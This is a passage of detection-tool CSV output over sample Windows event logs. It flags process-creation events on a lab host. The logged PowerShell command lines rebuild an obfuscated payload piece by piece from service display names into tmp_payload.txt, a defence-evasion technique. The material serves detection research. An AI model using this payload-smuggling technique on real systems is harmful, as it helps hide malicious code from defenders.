payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:49.667 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:51.102 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:51.118 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:51.118 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:52.551 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:52.566 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:52.566 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:54.003 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:54.003 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:54.003 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:55.437 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:55.453 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:55.453 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:56.883 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:56.898 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:56.898 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:58.382 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:58.382 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:58.382 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:59.833 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:59.833 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:59.833 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:01.284 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:01.284 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:01.284 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:02.737 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:02.737 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:02.737 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:04.183 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:04.198 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:04.198 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:05.632 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:05.648 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:05.648 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:07.101 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:07.101 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x390 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:07.101 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:08.552 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:08.552 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:08.552 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:10.020 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:10.036 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:10.036 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:11.507 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:11.523 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:11.523 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:12.952 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:12.952 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:12.952 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:14.409 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:14.409 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:14.409 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:15.863 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:15.863 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
